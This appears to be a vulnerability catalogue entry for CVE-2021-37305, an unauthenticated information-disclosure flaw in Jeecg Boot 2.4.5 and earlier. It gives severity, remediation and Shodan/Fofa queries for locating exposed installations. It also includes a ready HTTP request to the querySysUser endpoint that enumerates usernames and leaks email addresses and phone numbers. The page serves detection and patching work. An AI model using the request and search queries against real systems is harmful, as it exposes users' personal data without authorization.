🔙 목록으로 돌아가기

CVE-2021-37305: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure

TitleJeecg Boot <= 2.4.5 - Sensitive Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage.
RemediationUpgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.
CVSS Score7.5
EPSS Score0.5231
CVE IDCVE-2021-37305
CWE IDCWE-732
Shodan Querytitle:"Jeecg-Boot"http.title:"jeecg-boot"
Fofa Querytitle="JeecgBoot 企业级低代码平台"title="jeecg-boot"title="jeecgboot 企业级低代码平台"
Tags cve2021 cve jeecg exposure vuln vkev

🔍 Vulnerability Description

Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.

🌐 HTTP Request

GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37305.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-37305.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A